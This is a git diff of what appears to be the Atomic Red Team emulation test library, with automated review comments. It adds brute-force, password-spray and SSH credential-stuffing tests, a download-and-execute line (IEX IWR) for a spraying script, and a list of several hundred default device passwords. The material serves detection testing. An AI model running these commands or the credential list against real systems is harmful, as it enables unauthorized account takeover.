+**auto_generated_guid:** a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bits_job_name | Name of the created BITS job | String | qcxjb7|
| local_path | Local path to place file | Path | %temp%\Atomic-license.txt|
@@ -336,10 +374,14 @@ This technique is used by multiple adversaries and malware families.
**Supported Platforms:** Windows
+**auto_generated_guid:** 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| destination_path | Destination path to file | Path | $env:TEMP\Atomic-license.txt|
@@ -370,10 +412,14 @@ OSTap copies itself in a specfic way to shares and secondary drives. This emulat
**Supported Platforms:** Windows
+**auto_generated_guid:** 2ca61766-b456-4fcf-a35a-1233685e1cad
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| destination_path | Path to create remote file at. Default is local admin share. | String | \\localhost\C$|
@@ -405,6 +451,10 @@ Upon successful execution, this will rename cmd.exe as svchost.exe and move it t
**Supported Platforms:** Windows
+**auto_generated_guid:** fa5a2759-41d7-4e13-a19c-e8f28a53566f
+
+
+
@@ -439,10 +489,14 @@ More info and how to find your version can be found here https://lolbas-project.
**Supported Platforms:** Windows
+**auto_generated_guid:** 815bef8b-bf91-4b67-be4c-abe4c2a94ccc
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Location to save downloaded file | path | %temp%\Atomic-license.txt|
@@ -472,7 +526,7 @@ $retVal = 1
foreach ($version in @("4.18.2007.8-0","4.18.2007.9","4.18.2009.9")){
if (Test-Path "$env:ProgramData\Microsoft\Windows Defender\Platform\$version") { $retVal = 0}
}
-exit $retVal
+exit $retVal
```
##### Get Prereq Commands:
```powershell
@@ -482,4 +536,57 @@ Write-Host "Windows Defender verion 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 m
+
+
+
+## Atomic Test #14 - whois file download
+Download a remote file using the whois utility
+
+**Supported Platforms:** Linux, macOS
+
+
+**auto_generated_guid:** c99a829f-0bb8-4187-b2c6-d47d1df74cab
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_host | Remote hostname or IP address | String | localhost|
+| remote_port | Remote port to connect to | Integer | 8443|
+| output_file | Path of file to save output to | Path | /tmp/T1105.whois.out|
+| query | Query to send to remote server | String | Hello from Atomic Red Team test T1105|
+| timeout | Timeout period before ending process (seconds) | Integer | 1|
+
+
+#### Attack Commands: Run with `sh`!
+
+
+```sh
+timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
+```
+
+#### Cleanup Commands:
+```sh
+rm -f #{output_file}
+```
+
+
+
+#### Dependencies: Run with `sh`!
+##### Description: The whois and timeout commands must be present
+##### Check Prereq Commands:
+```sh
+which whois && which timeout
+```
+##### Get Prereq Commands:
+```sh
+echo "Please install timeout and the whois package"
+```
+
+
+
+
diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml
index 8a7c65e2..c90158a6 100644
--- a/atomics/T1105/T1105.yaml
+++ b/atomics/T1105/T1105.yaml
@@ -304,7 +304,7 @@ atomic_tests:
Uses the Windows Defender to download a file from the internet (must have version 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 installed).
The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file.
By default, the test downloads the Atomic Red Team license file to the temp directory.
-
+
More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
supported_platforms:
- windows
@@ -335,3 +335,49 @@ atomic_tests:
del #{local_path} >nul 2>&1
del %temp%\MpCmdRun.log >nul 2>&1
name: command_prompt
+- name: whois file download
+ auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab
+ description: |
+ Download a remote file using the whois utility
+
+ supported_platforms:
+ - linux
+ - macos
+
+ input_arguments:
+ remote_host:
+ description: Remote hostname or IP address
+ type: String
+ default: localhost
+ remote_port:
+ description: Remote port to connect to
+ type: Integer
+ default: 8443
+ output_file:
+ description: Path of file to save output to
+ type: Path
+ default: /tmp/T1105.whois.out
+ query:
+ description: Query to send to remote server
+ type: String
+ default: "Hello from Atomic Red Team test T1105"
+ timeout:
+ description: Timeout period before ending process (seconds)
+ type: Integer
+ default: 1
+
+ dependencies:
+ - description: |
+ The whois and timeout commands must be present
+ prereq_command: |
+ which whois && which timeout
+ get_prereq_command: |
+ echo "Please install timeout and the whois package"
+
+ executor:
+ name: sh
+ elevation_required: false
+ command: |
+ timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
+ cleanup_command: |
+ rm -f #{output_file}
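Review bot: `#{output_file}` is unquoted in the redirect on the command line while `#{query}` is quoted, so an output path containing a space splits the command; write `> "#{output_file}"` (and quote `#{remote_host}` likewise). `--preserve-status` means the normal case for this test, whois still connected when the 1-second timeout expires, exits with the signal status rather than 0, so a runner that treats non-zero as failure will report a failed test; if that is intended, say so in the description. The prereq uses `which`, which is not guaranteed by POSIX sh; `command -v whois && command -v timeout` is the portable form, and on macOS `timeout` is presumably not in the base system (it ships as `gtimeout` with coreutils), so the Get Prereq hint could mention that.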
diff --git a/atomics/T1106/T1106.md b/atomics/T1106/T1106.md
index 6e9899b7..0e25b7fe 100644
--- a/atomics/T1106/T1106.md
+++ b/atomics/T1106/T1106.md
@@ -21,10 +21,14 @@ Execute program by leveraging Win32 API's. By default, this will launch calc.exe
**Supported Platforms:** Windows
+**auto_generated_guid:** 99be2089-c52d-4a4a-b5c3-261ee42c8b62
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| source_file | Location of the CSharp source file to compile and execute | Path | PathToAtomicsFolder\T1106\src\CreateProcess.cs|
| output_file | Location of the payload | Path | %tmp%\T1106.exe|
diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md
index c92a2e31..1a6ad4fa 100644
--- a/atomics/T1110.001/T1110.001.md
+++ b/atomics/T1110.001/T1110.001.md
@@ -38,10 +38,14 @@ Creates username and password files then attempts to brute force on remote host
**Supported Platforms:** Windows
+**auto_generated_guid:** 09480053-2f98-4854-be6e-71ae5f672224
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file_users | Path to a file containing a list of users that we will attempt to brute force | Path | DomainUsers.txt|
| input_file_passwords | Path to a file containing a list of passwords we will attempt to brute force with | Path | passwords.txt|
@@ -60,6 +64,11 @@ echo "Password!" >> #{input_file_passwords}
@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
```
+#### Cleanup Commands:
+```cmd
+del #{input_file_users}
+del #{input_file_passwords}
+```
@@ -74,10 +83,14 @@ Attempt to brute force domain user on a domain controller, via LDAP, with NTLM o
**Supported Platforms:** Windows
+**auto_generated_guid:** c2969434-672b-4ec8-8df0-bbb91f40e250
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user | Account to bruteforce | String | bruce.wayne|
| passwords | List of passwords we will attempt to brute force with | String | Password1`n1q2w3e4r`nPassword!|
diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml
index 9cec219a..3cd7f88a 100644
--- a/atomics/T1110.001/T1110.001.yaml
+++ b/atomics/T1110.001/T1110.001.yaml
@@ -32,6 +32,9 @@ atomic_tests:
echo "1q2w3e4r" >> #{input_file_passwords}
echo "Password!" >> #{input_file_passwords}
@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
+ cleanup_command: |-
+ del #{input_file_users}
+ del #{input_file_passwords}
- name: Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos)
auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250
description: |
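Review bot: The new cleanup_command deletes `#{input_file_users}` and `#{input_file_passwords}` by the same relative paths the attack step used to create them, so it only works when the cleanup runs from the same working directory; that is presumably how the runner behaves, but it is worth noting in the description. The sibling cleanup in this diff (`del #{local_path} >nul 2>&1`) suppresses errors so a missing file does not fail the cleanup; for consistency use `del #{input_file_users} >nul 2>&1` and `del #{input_file_passwords} >nul 2>&1`. Note these files hold the brute-force user and password lists in clear text, so removing them is the right call.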
diff --git a/atomics/T1110.002/T1110.002.md b/atomics/T1110.002/T1110.002.md
index d2184605..67d78ecd 100644
--- a/atomics/T1110.002/T1110.002.md
+++ b/atomics/T1110.002/T1110.002.md
@@ -15,10 +15,14 @@ Execute Hashcat.exe with provided SAM file from registry of Windows and Password
**Supported Platforms:** Windows
+**auto_generated_guid:** 6d27df5d-69d4-4c91-bc33-5983ffe91692
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| hashcat_exe | Path to Hashcat executable | String | %temp%\hashcat6\hashcat-6.1.1\hashcat.exe|
| input_file_sam | Path to SAM file | string | PathToAtomicsFolder\T1110.002\src\sam.txt|
@@ -47,7 +51,7 @@ del %temp%\hashcat-unzip /Q /S >nul 2>&1
##### Description: Hashcat must exist on disk at specified location (#{hashcat_exe})
##### Check Prereq Commands:
```powershell
-if (Test-Path $(cmd /c echo #{hashcat_exe})) {exit 0} else {exit 1}
+if (Test-Path $(cmd /c echo #{hashcat_exe})) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1110.003/T1110.003.md b/atomics/T1110.003/T1110.003.md
index 7c23832c..b8450e15 100644
--- a/atomics/T1110.003/T1110.003.md
+++ b/atomics/T1110.003/T1110.003.md
@@ -41,10 +41,14 @@ See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne f
**Supported Platforms:** Windows
+**auto_generated_guid:** 90bc2e54-6c84-47a5-9439-0a2a92b4b175
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| password | The password to try for each user in users.txt | string | Spring2020|
@@ -63,7 +67,7 @@ See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne f
##### Description: List of domain users to password spray must exits at %temp%\users.txt
##### Check Prereq Commands:
```cmd
-if not exist %temp%\users.txt (exit /b 1)
+if not exist %temp%\users.txt (exit /b 1)
```
##### Get Prereq Commands:
```cmd
@@ -84,10 +88,14 @@ https://github.com/dafthack/DomainPasswordSpray
**Supported Platforms:** Windows
+**auto_generated_guid:** 263ae743-515f-4786-ac7d-41ef3a0d4b2b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Domain to brute force against | String | (Get-ADDomain | Select-Object -ExpandProperty Name)|
@@ -96,6 +104,7 @@ https://github.com/dafthack/DomainPasswordSpray
```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
```
@@ -115,10 +124,14 @@ Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain
**Supported Platforms:** Windows
+**auto_generated_guid:** f14d956a-5b6e-4a93-847f-0c415142f07d
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| password | single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001) | String | P@ssw0rd!|
| domain | Domain FQDN | String | contoso.com|
diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml
index 0ebeed4c..79d64c86 100644
--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
@@ -53,6 +53,7 @@ atomic_tests:
name: powershell
elevation_required: false
command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
- name: Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos)
auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d
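Review bot: The added `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12` line replaces the process-wide protocol set instead of extending it, so any protocol the host already had enabled (TLS 1.3 on newer Windows builds) is switched off for the rest of the PowerShell session, which in a harness that runs many tests in one process lives on well past this test. The usual form keeps the existing set and adds 1.2: `[Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12`. The same line is added in the T1115.yaml hunk below and in the T1115.md and T1134.001.md mirrors, and presumably in the T1134.001.yaml section whose hunks start after this view; fixing it once in each yaml and regenerating the markdown is enough. Pinning DomainPasswordSpray.ps1 to a commit hash on the following line is the right call and should stay; the enclosing atomic test definition starts above this hunk.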
diff --git a/atomics/T1110.004/T1110.004.md b/atomics/T1110.004/T1110.004.md
new file mode 100644
index 00000000..fb33c74f
--- /dev/null
+++ b/atomics/T1110.004/T1110.004.md
@@ -0,0 +1,123 @@
+# T1110.004 - Credential Stuffing
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1110/004)
+Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
+
+Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.
+
+Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:
+
+* SSH (22/TCP)
+* Telnet (23/TCP)
+* FTP (21/TCP)
+* NetBIOS / SMB / Samba (139/TCP & 445/TCP)
+* LDAP (389/TCP)
+* Kerberos (88/TCP)
+* RDP / Terminal Services (3389/TCP)
+* HTTP/HTTP Management Services (80/TCP & 443/TCP)
+* MSSQL (1433/TCP)
+* Oracle (1521/TCP)
+* MySQL (3306/TCP)
+* VNC (5900/TCP)
+
+In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)
+
+## Atomic Tests
+
+- [Atomic Test #1 - SSH Credential Stuffing From Linux](#atomic-test-1---ssh-credential-stuffing-from-linux)
+
+- [Atomic Test #2 - SSH Credential Stuffing From MacOS](#atomic-test-2---ssh-credential-stuffing-from-macos)
+
+
+
+
+## Atomic Test #1 - SSH Credential Stuffing From Linux
+Using username,password combination from a password dump to login over SSH.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 4f08197a-2a8a-472d-9589-cd2895ef22ad
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| target_host | IP Address / Hostname you want to target. | String | localhost|
+
+
+#### Attack Commands: Run with `bash`!
+
+
+```bash
+cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+```
+
+
+
+
+#### Dependencies: Run with `bash`!
+##### Description: Requires SSHPASS
+##### Check Prereq Commands:
+```bash
+if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
+```
+
+
+
+
+
+
+
+## Atomic Test #2 - SSH Credential Stuffing From MacOS
+Using username,password combination from a password dump to login over SSH.
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| target_host | IP Address / Hostname you want to target. | String | localhost|
+
+
+#### Attack Commands: Run with `bash`!
+
+
+```bash
+cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+```
+
+
+
+
+#### Dependencies: Run with `bash`!
+##### Description: Requires SSHPASS
+##### Check Prereq Commands:
+```bash
+if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
+brew install hudochenkov/sshpass/sshpass
+```
+
+
+
+
+
diff --git a/atomics/T1110.004/T1110.004.yaml b/atomics/T1110.004/T1110.004.yaml
new file mode 100644
index 00000000..0c408431
--- /dev/null
+++ b/atomics/T1110.004/T1110.004.yaml
@@ -0,0 +1,66 @@
+---
+attack_technique: T1110.004
+display_name: 'Brute Force: Credential Stuffing'
+
+atomic_tests:
+- name: SSH Credential Stuffing From Linux
+ auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad
+ description: |
+ Using username,password combination from a password dump to login over SSH.
+
+ supported_platforms:
+ - linux
+
+ input_arguments:
+ target_host:
+ description: IP Address / Hostname you want to target.
+ type: String
+ default: localhost
+
+ dependency_executor_name: bash
+ dependencies:
+ - description: |
+ Requires SSHPASS
+ prereq_command: |
+ if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
+ get_prereq_command: |
+ if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
+
+ executor:
+ name: bash
+ elevation_required: false
+ command: |
+ cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+ for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+
+- name: SSH Credential Stuffing From MacOS
+ auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
+ description: |
+ Using username,password combination from a password dump to login over SSH.
+
+ supported_platforms:
+ - macos
+
+ input_arguments:
+ target_host:
+ description: IP Address / Hostname you want to target.
+ type: String
+ default: localhost
+
+ dependency_executor_name: bash
+ dependencies:
+ - description: |
+ Requires SSHPASS
+ prereq_command: |
+ if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
+ get_prereq_command: |
+ /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
+ brew install hudochenkov/sshpass/sshpass
+
+ executor:
+ name: bash
+ elevation_required: false
+ command: |
+ cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+ for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+
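Review bot: Both tests copy the credential list to `/tmp/credstuffuserpass.txt` in their executor commands but define no `cleanup_command`, so the file is left behind after every run, while a sibling test in this same commit (the T1110.003 hunk tail above, with `del #{input_file_users}`) does remove its inputs. Adding `cleanup_command: |` followed by `rm -f /tmp/credstuffuserpass.txt` under each `executor:` would match that convention. The password field is extracted with `cut -d":" -f2`, which silently truncates any entry whose password contains a colon; `-f2-` keeps the remainder, and the `for … in $(cat …)` loop additionally relies on no entry containing whitespace, which is worth stating in the description. The macOS `get_prereq_command` pipes Homebrew's `install.sh` from an unpinned `master` branch straight into `bash`, in contrast to the commit-pinned fetch used for DomainPasswordSpray in T1110.003.yaml; pinning it, or at least documenting that the prereq step runs unpinned remote code, would be consistent with the rest of the commit.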
diff --git a/atomics/T1110.004/src/credstuffuserpass.txt b/atomics/T1110.004/src/credstuffuserpass.txt
new file mode 100644
index 00000000..ed0295f7
--- /dev/null
+++ b/atomics/T1110.004/src/credstuffuserpass.txt
@@ -0,0 +1,482 @@
+ADMINISTRATOR:ADMINISTRATOR
+ADMN:admn
+Administrator:3ware
+Administrator:admin
+Administrator:changeme
+Administrator:ganteng
+Administrator:letmein
+Administrator:password
+Administrator:pilou
+Administrator:smcadmin
+Any:12345
+CSG:SESAME
+Cisco:Cisco
+D-Link:D-Link
+DTA:TJM
+GEN1:gen1
+GEN2:gen2
+GlobalAdmin:GlobalAdmin
+HTTP:HTTP
+IntraStack:Asante
+IntraSwitch:Asante
+JDE:JDE
+LUCENT01:UI-PSWD-01
+LUCENT02:UI-PSWD-02
+MDaemon:MServer
+MICRO:RSX
+Manager:Manager
+Manager:friend
+NAU:NAU
+NETWORK:NETWORK
+NICONEX:NICONEX
+PBX:PBX
+PFCUser:240653C9467E45
+PRODDTA:PRODDTA
+PSEAdmin:$secure$
+PlcmSpIp:PlcmSpIp
+Polycom:SpIp
+RMUser1:password
+SYSADM:sysadm
+Sweex:Mysweex
+USERID:PASSW0RD
+User:Password
+VNC:winterm
+VTech:VTech
+ZXDSL:ZXDSL
+acc:acc
+adfexc:adfexc
+admin:0
+admin:0000
+admin:1111
+admin:11111111
+admin:123
+admin:1234
+admin:123456
+admin:1234567890
+admin:1234admin
+admin:2222
+admin:22222
+admin:3477
+admin:3ascotel
+admin:7ujMko0admin
+admin:7ujMko0vizxv
+admin:9999
+admin:Admin
+admin:AitbISP4eCiG
+admin:Ascend
+admin:BRIDGE
+admin:Intel
+admin:MiniAP
+admin:NetCache
+admin:NetICs
+admin:OCS
+admin:P@55w0rd!
+admin:PASSWORD
+admin:Protector
+admin:SMDR
+admin:SUPER
+admin:Symbol
+admin:TANDBERG
+admin:_Cisco
+admin:access
+admin:admin
+admin:admin117.35.97.74
+admin:admin123
+admin:admin1234
+admin:administrator
+admin:adminttd
+admin:adslolitec
+admin:adslroot
+admin:adtran
+admin:articon
+admin:asante
+admin:ascend
+admin:asd
+admin:atc123
+admin:atlantis
+admin:backdoor
+admin:barricade
+admin:barricadei
+admin:bintec
+admin:cableroot
+admin:changeme
+admin:cisco
+admin:comcomcom
+admin:conexant
+admin:default
+admin:diamond
+admin:enter
+admin:epicrouter
+admin:extendnet
+admin:fliradmin
+admin:giraff
+admin:hagpolm1
+admin:hello
+admin:help
+admin:hp.com
+admin:ironport
+admin:isee
+admin:jvc
+admin:kont2004
+admin:letmein
+admin:leviton
+admin:linga
+admin:meinsma
+admin:michaelangelo
+admin:michelangelo
+admin:microbusiness
+admin:motorola
+admin:mu
+admin:my_DEMARC
+admin:netadmin
+admin:noway
+admin:oelinux123
+admin:operator
+admin:p-assword
+admin:pass
+admin:password
+admin:passwort
+admin:pento
+admin:pfsense
+admin:private
+admin:public
+admin:pwp
+admin:radius
+admin:rmnetlm
+admin:root
+admin:secure
+admin:service
+admin:setup
+admin:sitecom
+admin:smallbusiness
+admin:smcadmin
+admin:speedxess
+admin:superuser
+admin:support
+admin:switch
+admin:synnet
+admin:sysAdmin
+admin:system
+admin:tech
+admin:ubnt
+admin:visual
+admin:w2402
+admin:wbox
+admin:xad$l#12
+admin:xad$|#12
+admin:zoomadsl
+admin2:changeme
+administrator:administrator
+administrator:changeme
+adminstat:OCS
+adminstrator:changeme
+adminttd:adminttd
+adminuser:OCS
+adminview:OCS
+alpine:alpine
+anonymous:Exabyte
+anonymous:any@
+apc:apc
+at4400:at4400
+bbsd-client:NULL
+bbsd-client:changeme2
+bciim:bciimpw
+bcim:bcimpw
+bcms:bcmspw
+bcnas:bcnaspw
+bcnas:pcnaspw
+blue:bluepw
+browse:browsepw
+browse:looker
+cablecom:router
+cablemodem:robotics
+cac_admin:cacadmin
+cas:cascade
+ccrusr:ccrusr
+cellit:cellit
+cgadmin:cgadmin
+cisco:cisco
+citel:citel
+client:client
+cmaker:cmaker
+comcast:1234
+corecess:corecess
+craft:craft
+craft:craftpw
+craft:crftpw
+cusadmin:highspeed
+cust:custpw
+customer:none
+dadmin:dadmin01
+davox:davox
+debug:d.e.b.u.g
+debug:synnet
+default:antslq
+default:default
+default:password
+deskalt:password
+deskman:changeme
+desknorm:password
+deskres:password
+device:device
+dhs3mt:dhs3mt
+dhs3pms:dhs3pms
+diag:danger
+diag:switch
+disttech:4tas
+draytek:1234
+e250:e250changeme
+e500:e500changeme
+echo:User
+echo:echo
+eng:engineer
+enquiry:enquirypw
+field:support
+guest:1111
+guest:12345
+guest:123456
+guest:User
+guest:guest
+guest:xc3511
+halt:tlah
+helpdesk:OCS
+hsa:hsadb
+hscroot:abc123
+iclock:timely
+images:images
+inads:inads
+inads:indspw
+init:initpw
+install:llatsni
+install:secret
+installer:installer
+intel:intel
+intermec:intermec
+intermec:intermec1QTPS
+kermit:kermit
+l2:l2
+l3:l3
+locate:locatepw
+login:0
+login:1111
+login:8429
+login:access
+login:admin
+login:password
+lp:lp
+m1122:m1122
+maint:maint
+maint:maintpw
+maint:ntacdmax
+maint:rwmaint
+manage:!manage
+manager:admin
+manager:change_on_install
+manager:friend
+manager:manager
+manager:sys
+manuf:xxyyzz
+mediator:mediator
+mg3500:merlin
+mlusr:mlusr
+monitor:monitor
+mother:fucker
+mtch:mtch
+mtcl:mtcl
+naadmin:naadmin
+netangr:attack
+netman:netman
+netopia:netopia
+netrangr:attack
+netscreen:netscreen
+nms:nmspw
+nokai:nokai
+nokia:nokia
+none:0
+none:admin
+op:op
+op:operator
+operator:$chwarzepumpe
+operator:1234
+operator:operator
+oracle:oracle
+patrol:patrol
+piranha:piranha
+piranha:q
+poll:tech
+public:public
+radware:radware
+rapport:r@p8p0r+
+rcust:rcustpw
+readonly:lucenttech2
+readwrite:lucenttech1
+recovery:recovery
+replicator:replicator
+ro:ro
+root:000000
+root:1111
+root:1234
+root:12345
+root:123456
+root:1234567890
+root:1234qwer
+root:123qwe
+root:1q2w3e4r5
+root:3ep5w2u
+root:54321
+root:666666
+root:7ujMko0admin
+root:7ujMko0vizxv
+root:888888
+root:Admin
+root:Cisco
+root:GMB182
+root:LSiuY7pOmZG2s
+root:Mau'dib
+root:PASSWORD
+root:ROOT500
+root:Serv4EMC
+root:Zte521
+root:abc123
+root:admin
+root:admin1234
+root:admin_1
+root:ahetzip8
+root:alpine
+root:anko
+root:antslq
+root:ascend
+root:attack
+root:avtech
+root:b120root
+root:bananapi
+root:blender
+root:calvin
+root:changeme
+root:cms500
+root:comcom
+root:coolphoenix579
+root:davox
+root:default
+root:dreambox
+root:fivranne
+root:ggdaseuaimhrke
+root:hi3518
+root:iDirect
+root:ikwb
+root:ikwd
+root:jauntech
+root:juantech
+root:jvbzd
+root:klv123
+root:klv1234
+root:letacla
+root:maxided
+root:oelinux123
+root:openssh
+root:openvpnas
+root:orion99
+root:pa55w0rd
+root:pass
+root:password
+root:permit
+root:realtek
+root:root
+root:tini
+root:tslinux
+root:ubnt
+root:user
+root:vizxv
+root:wyse
+root:xc3511
+root:xmhdipc
+root:zlxx.
+root:zte9x15
+router:router
+rw:rw
+rwa:rwa
+scmadmin:scmchangeme
+scout:scout
+secret:secret
+secure:secure
+security:security
+service:smile
+setup:changeme
+setup:changeme!
+setup:setup
+smc:smcadmin
+spcl:0
+storwatch:specialist
+stratacom:stratauser
+su:super
+super:5777364
+super:super
+super:surt
+super.super:master
+superadmin:secret
+superman:21241036
+superman:talent
+superuser:123456
+superuser:admin
+supervisor:PlsChgMe!
+supervisor:PlsChgMe1
+supervisor:supervisor
+supervisor:zyad1234
+support:123
+support:1234
+support:12345
+support:123456
+support:admin
+support:h179350
+support:login
+support:support
+support:supportpw
+support:zlxx.
+sys:uplink
+sysadm:Admin
+sysadm:PASS
+sysadm:anicust
+sysadm:sysadm
+sysadmin:PASS
+sysadmin:password
+sysadmin:sysadmin
+system:change_on_install
+system:password
+system:sys
+system/manager:sys/change_on_install
+target:password
+teacher:password
+tech:ANYCOM
+tech:ILMI
+tech:field
+tech:tech
+telco:telco
+telecom:telecom
+tellabs:tellabs#1
+telnet:telnet
+temp1:password
+test:test
+tiara:tiaranet
+tiger:tiger123
+topicalt:password
+topicnorm:password
+topicres:password
+ubnt:ubnt
+user:123456
+user:pass
+user:password
+user:public
+user:tivonpw
+user:user
+vcr:NetVCR
+volition:volition
+vt100:public
+webadmin:1234
+webadmin:webadmin
+websecadm:changeme
+wlse:wlsedb
+wradmin:trancell
+write:private
+xd:xd
+xxx:cascade
+zyfwp:PrOw!aN_fXp
